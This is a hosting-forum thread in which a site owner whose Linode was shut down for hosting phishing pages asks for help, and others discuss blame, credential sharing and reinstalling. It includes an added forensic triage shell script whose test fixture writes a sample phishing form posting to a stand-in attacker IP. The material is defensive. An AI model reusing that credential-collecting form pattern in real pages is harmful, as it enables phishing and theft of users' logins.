Urgent help needed....! Need to remove a phishing site...

Hi there

I am a website owner but not at all technical and the person who set up my sites has abandoned me it seems as he is not answering any emails ;(

I hope someone here can help. I received notification today that Linode has powered down my sites as a result of a phishing site residing on my space. I have no idea how to fix this but I really hope someone here can help as I desperately need to get things back up online and having just moved country, I know no-one locally to help either. It's all a bit bad timing…

The details from Linode support are:

Your Linode is still powered down, however we're forwarding these complaints for your reference.

We have received a report of a phishing website hosted on an IP address assigned to your Linode:

http://americaselitegroup.com/red.html

We have received two additional abuse complaints regarding the phishing web site located at the following URL:

http://americaselitehotels.com/eBay.html

When you are available to investigate this issue, we kindly ask that you carry out the investigation using the Finnix Recovery distribution:

http://library.linode.com/troubleshooting/finnix-rescue-mode

My account is 48195 and I will happily let you have whatever other login details to see what is going on if someone is kind enough to be able to take a look…

Thanks guys

Bart

10 Replies

I'll see if I can help you, add me on Skype: gladosdan

really? I don't mean to be rude.. but really?

you've been compromised in some way that you're hosting phishing websites, and now you're just gonna let someone from a forum log into your node?

@Internat:

> really? I don't mean to be rude.. but really?
>
> you've been compromised in some way that you're hosting phishing websites, and now you're just gonna let someone from a forum log into your node?

This guy is criminally negligent. Linode have been very nice to him by just powering down his Linode. As he is clearly not able to manage a virtual machine he should consider something safer like simple web hosting from hostgator.

That seems a bit harsh. To me it sounds like the OP believed he had a technical resource to support him, until the lack of response for this particular issue. Regardless, it's certainly not the only time the forums have been used to find consulting or other assistance, which I'd assume would include some references.

To the OP, it's possible this won't qualify since Linode didn't mention it in their own communication (and they said they wouldn't necessarily take all requests) but you might try opening a ticket to see if they would assist you as part of their trial of managed services (http://forum.linode.com/viewtopic.php?t=8349)

– David

> That seems a bit harsh. To me it sounds like the OP believed he had a technical resource to support him, until the lack of response for this particular issue. Regardless, it's certainly not the only time the forums have been used to find consulting or other assistance, which I'd assume would include some references.

I'm all for the forums being used for advice, and help, that's what they are for. But he does say I'll give you the login details for it.. That's what I have an issue with.

@Internat:

> I'm all for the forums being used for advice, and help, that's what they are for. But he does say I'll give you the login details for it.. That's what I have an issue with.

What issue? It's not like he was posting the information right in the forum. How would you expect a consultant/contractor to work on his node without that information?

– David

@db3l:

> That seems a bit harsh.

Yes, indeed. I was absolutely harsh but I was also fair.

If you let organized crime run a gambling club in your living room and the police come around, turn the lights off, then leave, I think you would have got off rather lightly. Not knowing you are breaking the law is never an excuse.

Professionally I'd be rather interested in what the phishers did to his Linode though. I'm guessing they got in with a guessable or reused password but maybe it was an exploit in some CGI script or suchlike.

No I do not believe that some of the reactions to this are too harsh. If the linode has been truly compromised by someone that is able to place their own files on the OS level, the only really correct action is to

1- back up the device (for later analysis or data retrieval)

2- shut it down

3- reinstall the linode from scratch taking into account current security guidelines.

Once a system has been compromised, there is really no way to be 100% sure that there is no other "backdoor" that has been installed that would reopen the system for another break-in once the phishing pages have been removed.

What we do not know here is if the original "consultant" here was running the phishing sites without the linode owner knowing or if the machine was compromised due to weak passwords, etc.

I too have run into too many "owners" willing to essentially turn over the "keys to the kingdom" with very little background checks on whom they are willing to trust with what is essentially their reputations, and in the long run, linode.com's reputation…

That is ONE of the many reasons we have so many botnets out there…
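For anyone landing on this thread with the same problem, here is an added example (not code from this thread, from Linode, or from the OP) of what step 1 of that procedure can look like in practice when run from a rescue environment such as the Finnix mode Linode pointed to, with the compromised disk mounted read-only. The device path, web root, log location and the sample web root and access log built by `make_fixture` are all constructed assumptions; the page names `red.html` and `eBay.html` come from the abuse report quoted in the first post.

```shell
#!/bin/sh
# Added example, not code from the thread or from Linode: first-response triage
# for the "back up, shut down, reinstall" procedure above. Intended to run from
# a rescue environment (e.g. Finnix) with the compromised disk mounted READ-ONLY.
# Device path, web root, log path and the fixture data are constructed assumptions.
set -e

# Step 1: image the disk before anything on it is changed, and record a hash so
# later analysis can show the copy was never modified.
image_disk() {
    dev="$1"; out="$2"
    dd if="$dev" of="$out" bs=65536 2>/dev/null
    sha256sum "$out" > "$out.sha256"
    sha256sum -c "$out.sha256" >/dev/null   # confirm the recorded hash verifies
}

# Files changed more recently than the last known-good deployment are the first
# suspects: phishing kits are dropped into the web root as ordinary pages.
recent_files() {
    root="$1"; days="$2"
    find "$root" -type f -mtime "-$days" | sort
}

# Access-log lines for the pages named in the abuse report. The earliest line
# bounds when the kit was already live, which scopes the compromise window
# (and tells you which backups predate it) before the reinstall.
log_hits() {
    log="$1"; shift
    for page in "$@"; do
        grep -F -- "$page" "$log" || true   # grep exits 1 on no match; not an error here
    done
}

count_log_hits() {
    grep -c -F -- "$2" "$1" || true
}

# Constructed fixture standing in for the mounted disk: a web root with two old
# legitimate files, one freshly dropped page, and a small access log.
make_fixture() {
    base="$1"
    mkdir -p "$base/webroot/images" "$base/logs"
    printf 'legit index\n' > "$base/webroot/index.html"
    printf 'logo\n' > "$base/webroot/images/logo.png"
    touch -t 201001010000 "$base/webroot/index.html" "$base/webroot/images/logo.png"
    printf '<form action="http://203.0.113.7/collect">\n' > "$base/webroot/eBay.html"
    cat > "$base/logs/access.log" <<'EOF'
203.0.113.5 - - [10/Jan/2010:10:00:00 +0000] "GET /index.html HTTP/1.1" 200 512
198.51.100.9 - - [11/Jan/2010:03:14:00 +0000] "GET /eBay.html HTTP/1.1" 200 2048
198.51.100.9 - - [11/Jan/2010:03:15:00 +0000] "POST /eBay.html HTTP/1.1" 200 2048
EOF
    printf 'stand-in disk contents' > "$base/disk.src"   # pretend block device
}

demo() {
    tmp=$(mktemp -d)
    make_fixture "$tmp"
    image_disk "$tmp/disk.src" "$tmp/disk.img"
    echo "image hash: $(cut -d' ' -f1 "$tmp/disk.img.sha256")"
    echo "files changed in the last 30 days under the web root:"
    recent_files "$tmp/webroot" 30
    echo "access-log lines for the reported pages:"
    log_hits "$tmp/logs/access.log" red.html eBay.html
    rm -rf "$tmp"
}

demo
```

On a real box you would point `image_disk` at the actual device (on Linode that is the disk as seen from the rescue system, not the running VM), keep the image and its `.sha256` off the compromised host, and only then move on to steps 2 and 3; the listing and log extraction are there to tell you how far back the compromise goes so you know which backup is safe to restore from.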

@TeddyR42:

> No I do not believe that some of the reactions to this are too harsh. If the linode has been truly compromised by someone that is able to place their own files on the OS level, the only really correct action is to
>
> 1- back up the device (for later analysis or data retrieval)
>
> 2- shut it down
>
> 3- reinstall the linode from scratch taking into account current security guidelines.

And hopefully most contractors would end up following a similar path.

It just seems unfortunate to me that following what was essentially a plea for help, the trend seemed to be to blame the OP for creating the scenario rather than offering suggestions on what to do.

I suppose this is veering off topic further, but if the OP is not expert enough to do this, how would you suggest a resource be located? It seems to me this forum should be a legitimate means to at least ask for assistance, and if anything might garner folks who are familiar with Linode. As I noted earlier, it's not the first time there have been requests here to help with management tasks. The initial post was pretty up front with the state of affairs, and the lack of an expected resource.

It would be nice if other responses offered other avenues of finding such support if in fact the belief is that doing so here is wrong or exhibits bad judgement. Just declaring the OP to be a bad operator, sans other suggestions, and knowing very few details about the situation, still seems a harsh response, or at least less than helpful.

> Once a system has been compromised, there is really no way to be 100% sure that there is no other "backdoor" that has been installed that would reopen the system for another break-in once the phishing pages have been removed.
>
> What we do not know here is if the original "consultant" here was running the phishing sites without the linode owner knowing or if the machine was compromised due to weak passwords, etc.

I don't really disagree with this, but again, it seems to me the OP was simply trying to get assistance to, in fact, repair the damage. The damage itself is already done, his Linode is already shut down, so the question at hand is how to proceed, and lacking the necessary expertise himself, how to find it.

> I too have run into too many "owners" willing to essentially turn over the "keys to the kingdom" with very little background checks on whom they are willing to trust with what is essentially their reputations, and in the long run, linode.com's reputation…

The implication being that the OP falls into this category? Any concrete suggestions (to go along with the rant) on how to determine who he should be willing to trust?

– David

PS: I can totally sympathize with the concern over poorly managed machines being potential vectors for spam and other abuse. I just think the goal should be to assist the OP in resolving the issue at hand.

Besides fixing your sites (hopefully you had good backups - like all the other advice - you really need to scrub the old site and start fresh), don't forget to "clear" your reputation.

Netcraft reports "This phishing site has been blocked by the Netcraft Toolbar." for your site.
